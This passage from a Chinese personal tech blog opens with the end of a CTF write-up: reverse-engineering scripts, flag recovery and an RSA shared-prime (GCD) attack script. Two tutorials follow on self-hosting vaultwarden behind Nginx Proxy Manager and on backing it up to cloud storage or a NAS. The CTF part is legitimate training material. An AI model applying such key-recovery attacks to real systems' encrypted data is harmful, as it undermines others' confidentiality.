class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-function">_BYTE *__fastcall <span class="hljs-title">crab_0o0</span><span class="hljs-params">(_BYTE *a1)</span></span><br><span class="hljs-function"></span>{<br> _BYTE *v1; <span class="hljs-comment">// rax</span><br> _BYTE *result; <span class="hljs-comment">// rax</span><br> _BYTE *v3; <span class="hljs-comment">// [rsp+0h] [rbp-18h]</span><br> _BYTE *v4; <span class="hljs-comment">// [rsp+10h] [rbp-8h]</span><br> _BYTE *i; <span class="hljs-comment">// [rsp+10h] [rbp-8h]</span><br><br> v3 = a1;<br> v4 = a1;<br> <span class="hljs-keyword">do</span><br> v1 = v4++;<br> <span class="hljs-keyword">while</span> ( *v1 );<br> <span class="hljs-keyword">for</span> ( i = v4 - <span class="hljs-number">2</span>; ; --i )<br> {<br> result = v3;<br> <span class="hljs-keyword">if</span> ( v3 >= i )<br> <span class="hljs-keyword">break</span>;<br> *v3 ^= *i;<br> *i ^= *v3;<br> *v3++ ^= *i;<br> }<br> <span class="hljs-keyword">return</span> result;<br>}<br></code></pre></td></tr></table></figure><p>拿到密文:<code>pWERzO3YjCldk:2NkGkc</code></p><p>由于异或可逆,这个可以不用逆向,直接用Python脚本跑一下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">s=<span class="hljs-string">'pWERzO3YjCldk:2NkGkc'</span><br>enc=[<span class="hljs-built_in">ord</span>(i) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> s]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(enc)):<br>enc[i]-=<span class="hljs-number">1</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">bytes</span>(enc)) <span class="hljs-comment"># b'oVDQyN2XiBkcj91MjFjb'</span><br></code></pre></td></tr></table></figure><p>再上C脚本:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> _BYTE char</span><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc,<span class="hljs-type">char</span> **argv,<span class="hljs-type">char</span> *envp[])</span><br>{<br> <span class="hljs-type">char</span> a1[]=<span class="hljs-string">"oVDQyN2XiBkcj91MjFjb"</span>;<br> _BYTE *v1; <span class="hljs-comment">// rax</span><br> _BYTE *v2; <span class="hljs-comment">// [rsp+0h] [rbp-18h]</span><br> _BYTE *v3; <span class="hljs-comment">// [rsp+10h] [rbp-8h]</span><br> _BYTE *i; <span class="hljs-comment">// [rsp+10h] [rbp-8h]</span><br><br> v2 = a1;<br> v3 = a1;<br> <span class="hljs-keyword">do</span><br> v1 = v3++;<br> <span class="hljs-keyword">while</span> ( *v1 );<br> <span class="hljs-keyword">for</span> ( i = v3 - <span class="hljs-number">2</span>; v2 < i; --i )<br> {<br> *v2 ^= *i;<br> *i ^= *v2;<br> *v2++ ^= *i;<br> }<br> <span class="hljs-built_in">puts</span>(a1);<br> <span class="hljs-comment">//bjFjM19jckBiX2NyQDVo</span><br>}<br></code></pre></td></tr></table></figure><p>base64解码得到flag:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041822243.png" alt="re"></p><h3 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h3><h4 id="没有文件后缀"><a href="#没有文件后缀" class="headerlink" title="没有文件后缀"></a>没有文件后缀</h4><p>要不是看了wp,我都不知道这道题有原题,不愧是省赛啊(doge)。</p><p>出处是:<a href="https://blog.csdn.net/zz_Caleb/article/details/88601860">https://blog.csdn.net/zz_Caleb/article/details/88601860</a></p><p>得到flag:<code>CTF{131Ack_3Y3_gA1AxY}</code></p><h3 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h3><h4 id="古典"><a href="#古典" class="headerlink" title="古典"></a>古典</h4><p>签到题,很多队伍很早就解出来了。(我为什么那么菜,过了好久才做出来qwq)</p><p>打开发现是base编码,用在线工具⼀个⼀个试可知是base32编码:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041823574.png" alt="cry-1"></p><p>synt是flag进行13位凯撒加密得到:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041822160.png" alt="cry-2"></p><p>得到flag:<code>flag{791ee565-afde-4772-89a7-6cddd6d0863f}</code></p><h4 id="alice-and-bob"><a href="#alice-and-bob" class="headerlink" title="alice and bob"></a>alice and bob</h4><p>alice和bob是rsa出现的经典人物。附件里只有四个数字,合理推测是n和c,典型模不互素:大的是n,小的是c,e用65537试⼀下:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> Crypto.Util.number import *<br>c1 = 0xa30e64bef4373f1ffdb9f6e116643ccef2f1f5e2509ee3937b7c3af6b36b5ef532cfbdeda<br>n1 = 0xe543df8c958aa57dbaea1ec39c192e5a8b26a64fbdcb3073ba388bc189fb645afd600b256<br>c2 = 0x3940203d1de79f980e30497847f25ca8562493310b2953570d435fa98bc7259ea119033c0<br>n2 = 0x9254d235f837be7093dadd7e89af96c43a919a0198b9e7f378a690fe8c655a42dffdaad9d<br><span class="hljs-attribute">q</span>=GCD(n1,n2)<br><span class="hljs-built_in">print</span>(isPrime(q))<br><br><span class="hljs-attribute">p1</span>=n1//q<br><span class="hljs-attribute">p2</span>=n2//q<br><span class="hljs-built_in">print</span>(isPrime(p1))<br><span class="hljs-built_in">print</span>(isPrime(p2))<br><span class="hljs-attribute">e</span>=65537<br><span class="hljs-attribute">d1</span>=inverse(e,(p1-1)*(q-1))<br><span class="hljs-attribute">d2</span>=inverse(e,(p2-1)*(q-1))<br><br><span class="hljs-attribute">m1</span>=pow(c1,d1,n1)<br><span class="hljs-attribute">m2</span>=pow(c2,d2,n2)<br><br><span class="hljs-built_in">print</span>(long_to_bytes(m1))<br><span class="hljs-built_in">print</span>(long_to_bytes(m2))<br><br>PYTHON<br></code></pre></td></tr></table></figure><p>果然是这样,最终得到的flag是:<code>flag{real_man_wear_black_suit}</code></p>]]></content>
<categories>
<category>CTF</category>
</categories>
</entry>
<entry>
<title>家庭服务器搭建vaultwarden(二)</title>
<link href="/2023/01/09/%E5%AE%B6%E5%BA%AD%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BAvaultwarden%EF%BC%88%E4%BA%8C%EF%BC%89/"/>
<url>/2023/01/09/%E5%AE%B6%E5%BA%AD%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BAvaultwarden%EF%BC%88%E4%BA%8C%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>在上一篇文章中,我们讲到了如何搭建<code>vaultwarden</code>的服务端。在这篇文章中,我将教大家实现一个进阶玩法,那就是定时备份。不过在此之前,我插一句嘴:</p><blockquote><p>其实上次的<code>docker-compose.yml</code>,可以简写为以下形式:</p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-attr">version:</span> <span class="hljs-string">"3"</span><br><span class="hljs-attr">services:</span><br> <span class="hljs-attr">vaultwarden:</span> <span class="hljs-comment"># 容器名,可以改</span><br> <span class="hljs-attr">image:</span> <span class="hljs-string">"vaultwarden/server:latest"</span><br> <span class="hljs-attr">restart:</span> <span class="hljs-string">unless-stopped</span><br> <span class="hljs-attr">volumes:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">/vw-data/:/data/</span> <span class="hljs-comment"># 前面的是服务器的目录,后面的是容器内部的</span><br> <span class="hljs-attr">environment:</span><br> <span class="hljs-attr">SIGNUPS_ALLOWED:</span> <span class="hljs-literal">false</span> <span class="hljs-comment"># 禁止其他人注册</span><br> <span class="hljs-attr">WEBSOCKET_ENABLED:</span> <span class="hljs-literal">true</span> <span class="hljs-comment"># 开启自动同步</span><br> <span class="hljs-attr">INVITATIONS_ALLOWED:</span> <span class="hljs-literal">true</span> <span class="hljs-comment"># 开启邀请注册</span><br> <span class="hljs-attr">ADMIN_TOKEN:</span> <span class="hljs-string">xxxxxx</span> <span class="hljs-comment"># 自己生成</span><br><br> <span class="hljs-attr">nginxpm:</span> <span class="hljs-comment"># 容器名,可以改</span><br> <span class="hljs-attr">image:</span> <span class="hljs-string">'jc21/nginx-proxy-manager:latest'</span><br> <span class="hljs-attr">restart:</span> <span class="hljs-string">unless-stopped</span><br> <span class="hljs-attr">ports:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'10042:80'</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'10041:81'</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'10043:443'</span><br><br></code></pre></td></tr></table></figure><p>把两个镜像的拉取和容器的启动合二为一,节省了不少麻烦的操作。</p><p><strong>注意:第一次创建<code>vaultwarden</code>容器时还是要用图形化界面创建,只有创建完你的用户名和密码后,才能用上述的<code>yaml</code>文件启动。</strong></p></blockquote><p>其实有了宝塔面板,定时备份很简单。利用软件商店里面的插件,我们可以把密码数据库同步到公有云,也可以同步到私有云。下面,听我细说!</p><h2 id="备份到公有云"><a href="#备份到公有云" class="headerlink" title="备份到公有云"></a>备份到公有云</h2><p>这里以腾讯云的COS为例(其实是因为去年双十一只花了1元就买了50G容量,约等于白嫖,不用白不用)。</p><p>先登录腾讯云,实名认证后在“云产品”下拉框中选择“对象存储”:</p><p><img src="https://s2.loli.net/2023/01/13/LHcE2GYKkyAPCw7.png"></p><h3 id="创建存储桶"><a href="#创建存储桶" class="headerlink" title="创建存储桶"></a>创建存储桶</h3><p>购买相应套餐后创建存储桶:</p><p><img src="https://s2.loli.net/2023/01/13/VeCLBOjwpnlxJP5.png"></p><p><img src="https://s2.loli.net/2023/01/13/K83gupERrm574yd.png"></p><p>最后点“创建”即可。</p><h3 id="创建子用户"><a href="#创建子用户" class="headerlink" title="创建子用户"></a>创建子用户</h3><p>接着打开”云产品“-“访问管理”-“用户”-“用户列表”,新建一个子用户,类型选“自定义创建”:</p><p><img src="https://s2.loli.net/2023/01/13/baxwjhnI7tJc9ik.png"></p><p><img src="https://s2.loli.net/2023/01/13/DhbXNcxZ39jwKfn.png"></p><p><img src="https://s2.loli.net/2023/01/13/1OcfoG3dxtJiezE.png"></p><p>在策略中,我们只需要选择一个权限<code>QcloudAccessForCOSBatchRole</code>,这样这个子用户就只能操作COS相关的资源,不会影响到账号内的其他服务:</p><p><img src="https://s2.loli.net/2023/01/13/tEG5pr1zHQPZTBa.png"></p><p>用户标签可以不创建,把生成的<code>SecretId</code>和<code>SecretKey</code>保存下来,并复制到宝塔插件中。</p><h3 id="设置插件"><a href="#设置插件" class="headerlink" title="设置插件"></a>设置插件</h3><p>首先要在宝塔面板的“软件商店”中搜索并下载“腾讯云COS”插件,这里就不演示了。设置图示如下:</p><p><img src="https://s2.loli.net/2023/01/13/HbeAKlGoXcNdCBV.png"></p><h3 id="auto-backup">设置自动备份</h3><p>最后,在宝塔面板左侧栏的“计划任务”中设置定时自动备份:</p><p><img src="https://s2.loli.net/2023/01/13/voTRN1zndWLbgyI.png"></p><p>OK,大功告成了!当然,自动备份的时间也是可以修改的。</p><h2 id="备份到私有云"><a href="#备份到私有云" class="headerlink" title="备份到私有云"></a>备份到私有云</h2><p>有些师傅可能会担心:备份到公有云,还是不太放心,而且还是国内的公有云(懂得都懂)。如果你恰巧财力雄厚,你可以考虑购买一台nas服务器,如果有的话当我没说。这里我以群晖的nas服务器为例,现在我们登录进web管理页面,打开“控制面板”-“文件服务”-“FTP”,开启FTP服务:</p><p><img src="https://s2.loli.net/2023/01/13/Ob3ztVSrglNuE7H.png" alt="下面的SFTP服务也可以打开"></p><h3 id="创建专用账户"><a href="#创建专用账户" class="headerlink" title="创建专用账户"></a>创建专用账户</h3><p>点左侧的“用户与群组”-“用户账号”-“新增”,为FTP服务专门创建一个账号:</p><p><img src="https://s2.loli.net/2023/01/13/7b8FnLzdcAW2lo5.png"></p><p><img src="https://s2.loli.net/2023/01/13/zFlkOQr84yTp1fP.png"></p><p>下一步只需要授予备份文件夹(需要在“共享文件夹”里单独创建)的可读写权限,其它的全部选“禁止访问”,由于个人隐私原因我就不截图了,其它选项按个人情况选择。应用程序的访问权限,只需要允许FTP和SFTP的:</p><p><img src="https://s2.loli.net/2023/01/13/h6zA7PZEMSJqWG4.png" alt="SFTP忘记画箭头了"></p><h3 id="设置插件-1"><a href="#设置插件-1" class="headerlink" title="设置插件"></a>设置插件</h3><p>其它选项确认无误后,可以点击完成了。去宝塔面板的“软件商店”中搜索并下载“FTP存储空间”插件,按下图所示设置:</p><p><img src="https://s2.loli.net/2023/01/13/GnJbleOxcfi2MkC.png" alt="用户名填刚才创建的,IP填局域网的"></p><p>定时自动备份的设置方法和上面<a href="#auto-backup">公有云</a>的类似,这里就不多说了。</p><h2 id="常见问题"><a href="#常见问题" class="headerlink" title="常见问题"></a>常见问题</h2><p>如果你的<code>vaultwarden</code>出现了问题,删除容器后重新创建多少次也没用,那么建议你先清理一下无用的存储卷等,具体可参考文章:<a href="https://note.qidong.name/2017/06/26/docker-clean/">https://note.qidong.name/2017/06/26/docker-clean/</a></p><p>如果还是有问题,那可能就是镜像源的问题了。在宝塔面板中进入<code>docker</code>设置页面,加速URL可设置为:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">{</span><br> <span class="hljs-attr">"registry-mirrors"</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><br> <span class="hljs-string">"https://mirror.baidubce.com"</span><br> <span class="hljs-punctuation">]</span><br><span class="hljs-punctuation">}</span><br></code></pre></td></tr></table></figure><p>再执行命令<code>systemctl daemon-reload</code>和<code>systemctl restart docker</code>(CentOS系统)重启<code>docker</code>服务。修改过后再打开<code>vaultwarden</code>的web页面,我惊喜地发现网页的图标变了,看来可能确实是镜像源的问题。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>在这篇文章中,我教大家实现了密码数据库的自动备份,为数据安全又多加了一层保障。同样的,这种方法也适用于网站和个人博客的备份。</p><p>关于自建密码管理器服务器的教程到这里也就暂时告一段落了,如果还有什么疑问或者技术上的问题,欢迎在评论区留言,我会尽量帮助你们。在这里给各位师傅拜个早年了!</p>]]></content>
<categories>
<category>生活点滴</category>
</categories>
<tags>
<tag>教程</tag>
<tag>数码折腾</tag>
</tags>
</entry>
<entry>
<title>家庭服务器搭建vaultwarden(一)</title>
<link href="/2023/01/04/%E5%AE%B6%E5%BA%AD%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BAvaultwarden%EF%BC%88%E4%B8%80%EF%BC%89/"/>
<url>/2023/01/04/%E5%AE%B6%E5%BA%AD%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BAvaultwarden%EF%BC%88%E4%B8%80%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>作为一名信息安全爱好者,保护好自己的个人信息是必不可少的,其中的一个重要环节就是保护自己的密码。但是每个平台的密码都不一样,怎么记住那么多密码呢?这时候就需要用到密码管理软件了。因为前段时间,付费密码管理软件–<code>lastpass</code>被黑客脱库,因此让我对公有的密码管理服务更加不放心了。正巧有一次在tg群里吹水时,了解到还有<code>bitwarden</code>这款开源免费、可自行搭建服务端,并且支持多平台的密码管理软件,于是便想着用自己家里的虚拟服务器搭建一个试试。但是,官方的<code>bitwarden</code>使用<code>SQL server</code>存储数据,对于服务器配置要求太高,我便采用了同样开源免费、用<code>Rust</code>语言重写服务端、更轻巧的第三方密码管理软件–<code>vaultwarden</code>。</p><p>项目地址:<a href="https://github.com/dani-garcia/vaultwarden">https://github.com/dani-garcia/vaultwarden</a></p><p>这可能是全网唯一一篇用自己家里的服务器搭建<code>vaultwarden</code>的教程了。网上的教程大多用公有云的vps搭建,但是国内vps需要备案才能使用,费时费力不说还有泄露隐私的风险;除此之外就是使用家里的群晖nas搭建,但是我的nas配置太低,而且<code>ARM</code>架构不支持<code>docker</code>,所以我只能忍痛放弃这条路。因为国内的家庭宽带不像vps一样开放了80和443端口,服务器设置<code>Nginx</code>反向代理也不像群晖nas那样简单方便,所以我踩了不少坑。下面我将亲自示范如何搭建一个开源的密码管理平台<code>vaultwarden</code>,搭建自己的私人密码库,让账号密码更安全。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="准备"><a href="#准备" class="headerlink" title="准备"></a>准备</h3><p>首先,你需要一台安装好<code>docker</code>和<code>docker-compose</code>的<code>Linux</code>服务器,并且购买一个域名。对于家庭宽带而言,你需要拥有一个公网ip地址,并且域名需要提前配置好<code>ddns</code>(我的往期文章中讲过阿里云的配置方法,其它域名服务商也类似,都是通过调用api来更新域名解析)。你可以采用命令安装,但是我为了省事,使用了宝塔面板安装(也可以使用宝塔面板的国际版–<code>aapanel</code>,更安全)。完事后拉取<code>vaultwarden</code>的镜像,因为我的宝塔面板拉取镜像的功能有问题,所以只能使用命令拉取了:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker pull vaultwarden/server:latest<br></code></pre></td></tr></table></figure><h3 id="踩坑"><a href="#踩坑" class="headerlink" title="踩坑"></a>踩坑</h3><p>拉取完成后不要急,先安装<code>Nginx</code>并创建一个网站,点击“添加站点”,“创建站点”里面填写你购买好的域名,一定要带上端口号。这里的局域网<code>http</code>端口我为了避免以后可能的冲突,就没有填写80,而是填了一个比较大的作为<code>http</code>端口。<code>PHP</code>版本选择“纯静态”,其它的全部不创建,完成后点“提交”:</p><p><img src="https://s2.loli.net/2023/01/05/mF6CaR8WiEdZlq1.png"></p><p>接着,在根目录下创建一个文件夹<code>vw-data</code>,用于存放<code>vaultwarden</code>的数据,再去刚才创建的网站,把网站目录改成你创建的这个文件夹。当然,你也可以用创建网站时自动生成的网站目录,但下图“挂载卷“中的“服务器目录”也要改成自动生成的网站目录,即<code>/www/wwwroot/abc.com/</code>。准备就绪后,去创建对应的<code>docker</code>容器,画红框的按照截图里面的填就行:</p><p><img src="https://s2.loli.net/2023/01/05/PFzU1Ie8CGwtSMT.png"></p><p><img src="https://s2.loli.net/2023/01/05/kyTwAMEg4Zh5Qt8.png" alt="2"></p><p><strong>注意:这里的服务器端口要和前面创建网站填写的一样,创建网站和创建容器这两步千万不能反过来,否则会报“端口被占用”的错误!</strong></p><p>由于<code>vaultwarden</code>的网页端必须要通过<code>https</code>访问,才能创建账号,所以我们必须要配置<code>SSL</code>证书。根据官方文档中的说明,采用<code>docker</code>挂载<code>SSL</code>证书的方式无法使用自动同步的功能,所以我们采用<code>Nginx</code>反向代理的方式。点击你创建的网站右侧的”设置“,再点左侧的”SSL”,申请证书或者填写已有的证书即可,建议申请通配符证书。</p><p>再点击左侧栏中的“反向代理”,点击”添加反向代理“,”目标URL“填写<code>http://127.0.0.1:前面你设置的局域网http端口</code>,其它的不用填,提交后再点击“配置文件”,把其替换为以下内容:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs bash">location / {<br><span class="hljs-comment"># 6666端口替换成你前面设置的http端口</span><br> proxy_pass http://127.0.0.1:6666;<br> proxy_http_version 1.1;<br> proxy_cache_bypass <span class="hljs-variable">$http_upgrade</span>;<br> proxy_set_header Upgrade <span class="hljs-variable">$http_upgrade</span>;<br> proxy_set_header Connection <span class="hljs-string">"upgrade"</span>;<br> proxy_set_header Host <span class="hljs-variable">$host</span>;<br> proxy_set_header X-Real-IP <span class="hljs-variable">$remote_addr</span>;<br> proxy_set_header X-Forwarded-For <span class="hljs-variable">$proxy_add_x_forwarded_for</span>;<br> proxy_set_header X-Forwarded-Proto <span class="hljs-variable">$scheme</span>;<br> proxy_set_header X-Forwarded-Host <span class="hljs-variable">$host</span>;<br> proxy_set_header X-Forwarded-Port <span class="hljs-variable">$server_port</span>;<br>}<br><br>location /notifications/hub {<br> proxy_pass http://127.0.0.1:3012;<br> proxy_set_header Upgrade <span class="hljs-variable">$http_upgrade</span>;<br> proxy_set_header Connection <span class="hljs-string">"upgrade"</span>;<br>}<br><br>location /notifications/hub/negotiate {<br><span class="hljs-comment"># 6666端口替换成你前面设置的http端口</span><br> proxy_pass http://127.0.0.1:6666;<br>}<br><br>location /admin {<br> proxy_set_header Host <span class="hljs-variable">$host</span>;<br> proxy_set_header X-Real-IP <span class="hljs-variable">$remote_addr</span>;<br> proxy_set_header X-Forwarded-For <span class="hljs-variable">$proxy_add_x_forwarded_for</span>;<br> proxy_set_header X-Forwarded-Proto <span class="hljs-variable">$scheme</span>;<br> <span class="hljs-comment"># 6666端口替换成你前面设置的http端口</span><br> proxy_pass http://127.0.0.1:6666;<br>}<br><span class="hljs-comment"># 加入robots.txt 防止搜索引擎爬虫抓取</span><br>location = /robots.txt {<br><span class="hljs-comment"># 改成你自己的目录</span><br>root /home/wwwroot/Bitwarden;<br>}<br><br></code></pre></td></tr></table></figure><p>同样,这里的局域网<code>https</code>端口我为了避免以后可能的冲突,也没有填写443,而是前往左侧栏中的“配置文件”,把红框中的443端口替换成了其它的:</p><p><img src="https://s2.loli.net/2023/01/05/GoNxQtYZhVUwLlO.png"></p><p>修改完成后,别忘记重载<code>Nginx</code>配置,或者直接重启<code>Nginx</code>。</p><p>最后去你家光猫或者路由器后台设置一下端口转发(有的路由器叫“端口映射”),就可以了,记住外网端口不能填80和443。经过我这样一波操作,理论上用<code>https://域名:外网非标准https端口</code>应该是可以访问的,但实际上怎么都打不开网页端。</p><p>这时,就让我隆重介绍这次折腾的主角–<code>Nginx Proxy Manager</code>!</p><h3 id="正道"><a href="#正道" class="headerlink" title="正道"></a>正道</h3><p>说到底,<code>Nginx Proxy Manager</code>其实就是一个图形化的管理面板。我们同样采用<code>docker-compose</code>安装,在<code>/root</code>目录下新建一个文件夹<code>npm</code>(也可以叫其它名字),并在<code>npm</code>文件夹下创建一个<code>docker-compose.yml</code>文件,内容填写:</p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-attr">version:</span> <span class="hljs-string">'3'</span><br><span class="hljs-attr">services:</span><br> <span class="hljs-attr">app:</span><br> <span class="hljs-attr">image:</span> <span class="hljs-string">'jc21/nginx-proxy-manager:latest'</span><br> <span class="hljs-attr">restart:</span> <span class="hljs-string">unless-stopped</span><br> <span class="hljs-attr">ports:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'4636:80'</span> <span class="hljs-comment"># 前面的局域网http端口可以修改成其它的</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'4637:81'</span> <span class="hljs-comment"># 前面的局域网gui管理端口可以修改成其它的</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'4638:443'</span> <span class="hljs-comment"># 前面的局域网https端口可以修改成其它的</span><br></code></pre></td></tr></table></figure><p>使用命令<code>docker-compose up -d</code>创建<code>Nginx Proxy Manager</code>容器,局域网内用<code>http://局域网ip:4637</code>访问<code>Nginx Proxy Manager</code>后台,默认账号和密码如下:</p><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">邮箱:<span class="hljs-symbol">admin@</span>example.com<br>密码:changeme<br></code></pre></td></tr></table></figure><p>进入后台以后最好修改一下邮箱和密码,其中邮箱是用来提醒你更新<code>SSL</code>证书的。点击最上面菜单里的”Hosts”,再选择下拉框里的”Proxy Hosts”:</p><p><img src="https://s2.loli.net/2023/01/05/1vMidgXtnGr6CJx.png"></p><p>点右边的”Add Proxy Host”,下面的内容按照截图里面的填写:</p><p><img src="https://s2.loli.net/2023/01/05/wjZbTVMs7cUFXxK.png"></p><p>其中<code>vaultwarden</code>容器的ip可以在宝塔面板里看到。</p><p>再接着设置<code>SSL</code>证书,可以用自己申请好的,也可以用<code>Nginx Proxy Manager</code>提供的申请证书功能,我使用的是自己申请好的。点击上方菜单中的”SSL Certificates”,再选择”Add SSL Certificate”下拉框中的”Custom”:</p><p><img src="https://s2.loli.net/2023/01/05/3MTFpUkJ4aoW1Hq.png"></p><p><img src="https://s2.loli.net/2023/01/05/NF2L4VGvoxKZq1l.png"></p><p>设置完证书后再回到刚才设置反向代理的页面,选择刚才上传的证书:<img src="https://s2.loli.net/2023/01/05/mlDzZsXuCrhUqjo.png"></p><p>这里不建议开启”Force SSL”(强制https)选项,因为实测非标准端口开启此功能后会出现一些问题。</p><p>最后去你家光猫或者路由器后台设置一下端口转发(有的路由器叫“端口映射”),就可以了,记住外网端口不能填80和443。</p><p>在电脑浏览器中输入<code>https://自己的域名:外网https端口</code>,完美访问:</p><p><img src="https://s2.loli.net/2023/01/05/XUoK96imxGTOLAs.png"></p><p>还没完,点击“创建账号”创建你自己的账号后,如果你不想其他人使用你的密码库,记得一定要关闭用户注册功能。当然,关闭以后你也可以发邮件邀请其他人注册,只不过要配置<code>SMTP</code>服务器。</p><p>怎么关闭呢?先删除你创建的<code>vaultwarden</code>容器,不用担心刚才创建的账户密码没了,因为它们被存放在了服务器的挂载目录中,也就是我设置的<code>/vw-data</code>。删掉之后再创建docker容器,还是使用<code>vaultwarden/server:latest</code>镜像,但这次不需要设置映射端口了,而且下面的“环境变量”中需要填写以下内容:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">SIGNUPS_ALLOWED=<span class="hljs-literal">false</span> <span class="hljs-comment"># 关闭用户注册</span><br>WEBSOCKET_ENABLED=<span class="hljs-literal">true</span> <span class="hljs-comment"># 开启自动同步</span><br>INVITATIONS_ALLOWED=<span class="hljs-literal">true</span> <span class="hljs-comment"># 开启邀请注册</span><br>ADMIN_TOKEN=xxxxxxxxxxx <span class="hljs-comment"># 填写你自己的,使用命令openssl rand -base64 48生成,一定要保存好!</span><br></code></pre></td></tr></table></figure><p>启动容器后,如果容器ip改变了,记得去<code>Nginx Proxy 